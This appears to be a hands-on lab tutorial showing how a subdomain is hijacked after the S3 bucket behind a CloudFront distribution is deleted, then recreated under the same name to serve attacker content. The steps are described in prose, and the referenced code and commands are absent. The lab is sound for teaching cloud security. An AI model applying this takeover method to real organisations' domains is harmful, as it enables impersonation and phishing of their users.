AWS S3 is a storage service by Amazon. Any kind of file. Permissions can be then given per object and per bucket. Most often than not, AWS S3 buckets have been discovered with weak permissions on individual objects or the entire buckets itself. Files and folders which should not be public are made world readable and available to the world for inspection.
Organisations ofen use this property of S3 to host their static websites & attach it to the CloudFront. Amazon CloudFront is a web service that works as a content delivery network(CDN), it speeds up distribution of static and dynamic web content, such as HTML, javascript, CSS, PHP, and image files. Many sites and organisations use it as a service for distributing their content faster on servers local to users.
What are we going to cover?
This chapter covers hijacking of a subdomain due to deletion of a S3 bucket, which is within Cloudfront distribution.
Steps to setup
There are maily 2 services involved in the lab.
AWS S3
AWS CloudFront
The userflow of the lab begins with creating a bucket & using this bucket to host the static web application. A CloudFront distribution is created & attached it to the static web application created via S3 bucket.
Now navigate to your AWS console & open S3 section.
Create a bucket with www.unique-name.com & in the bucket ownership enable the ACL's.
Disable the block all public access while creating the bucket.
Once the bucket is created, navigate to the properties.
Go to the bottom of the page, there is a static website hosting. Click edit & enable the option to host the webpage.
Now lets host the webiste with simple html file. Get your files by following command
In case if you face any error while pasting the policy, Use json beautify to rearrange
We have successfully created the bucket, now configure the S3 bucket as the origin within Cloudfront.
Navigate to your Cloudfront section & create a distribution.
We will enable the redirect HTTP to HTTPS. Now click create distribution.
Now, select the cachedisabled in cache key and origin requests
Wait for some time, you will get the Cloudfront domain, Now open the domain in your browser.
We are done with the lab setup, Now follow the steps to attack
Steps to attack
Once the environment is ready. Open your browser & paste the domain name which is present in your AWS account > Cloudfront.
cloudfront deleted
Now on the other tab open your static website, you can get this from your S3 > bucket properties . You should see a welcome page on the website.
cloudfront deleted
Navigate to the cloudfront domain & you can see the welcome message.
cloudfront deleted
Delete the bucket, which you have created in the setup process with unique-name. To do that navigate to your S3 > buckets empty the bucket & delete the bucket.
cloudfront deleted
Now, how an attacker can use this?
cloudfront deleted
How to Claim sub-domain via dangling CloudFront
We can see that the error is disclosing the S3 bucket name. Now, wait for a minute and create a new bucket with same name.
Once the bucket is created, Now, attacker changes the permissions & properties to host a static website. Attacker adds the custom bucket policy.
Now, enable the static website hosting & add entry file as index.html. Once you are done with the basic setup on the Cloudfront side, next is the step of creating your take over page. This can effectively be anything you want to host on either S3 bucket or your own web server. Use the following code to do that.
Once you upload the index file to the bucket, navigate to your bucket properties & enable static website hosting.
Now, upload your files to your bucket & make sure you have index.html. Navigate to the cloudfront domain .
It is a static page with a little JavaScript to highlight the domain that's being taken over/hijacked. We have successfully hijacked.
